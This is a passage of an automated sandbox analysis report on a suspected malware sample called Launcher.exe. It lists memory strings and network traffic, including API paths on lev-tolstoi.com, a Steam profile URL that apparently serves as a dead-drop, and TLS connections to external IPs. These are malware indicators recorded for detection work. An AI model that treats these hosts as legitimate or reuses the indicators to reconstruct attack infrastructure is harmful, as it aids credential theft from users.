                Source: Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/er
                Source: Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pS
                Source: Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piC
                Source: Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pik
                Source: Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/uo
                Source: Launcher.exe, 00000003.00000003.2318562532.000000000101B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/urT
                Source: Launcher.exe, 00000003.00000003.2386728051.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482226766.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2482875381.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2387068270.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: Launcher.exe, 00000003.00000003.2183979276.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apii
                Source: Launcher.exe, 00000003.00000002.2482875381.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2387068270.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apil
                Source: Launcher.exe, 00000003.00000003.2183979276.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apirofiles/76561199724331900f
                Source: Launcher.exe, 00000003.00000003.2132993100.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: Launcher.exe, 00000003.00000003.2132993100.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: Launcher.exe, 00000003.00000003.2481834662.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2482847512.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampo
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: Launcher.exe, 00000003.00000003.2132993100.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: Launcher.exe, 00000003.00000003.2132993100.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: Launcher.exe, 00000003.00000003.2320485776.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Launcher.exe, 00000003.00000003.2320485776.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Launcher.exe, 00000003.00000003.2342762668.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2342989032.00000000039FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Launcher.exe, 00000003.00000003.2342762668.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2342989032.00000000039FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Launcher.exe, 00000003.00000003.2132993100.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: Launcher.exe, 00000003.00000003.2320485776.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Launcher.exe, 00000003.00000003.2320485776.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Launcher.exe, 00000003.00000003.2320485776.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Launcher.exe, 00000003.00000003.2320485776.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Launcher.exe, 00000003.00000003.2320485776.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Launcher.exe, 00000003.00000003.2320485776.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49783 version: TLS 1.2
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009C10000_2_009C1000
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009D87410_2_009D8741
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009DE9300_2_009DE930
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009EBA420_2_009EBA42
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009D9B400_2_009D9B40
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009D3CDF0_2_009D3CDF
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009E9C730_2_009E9C73
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_3_00F82F383_3_00F82F38
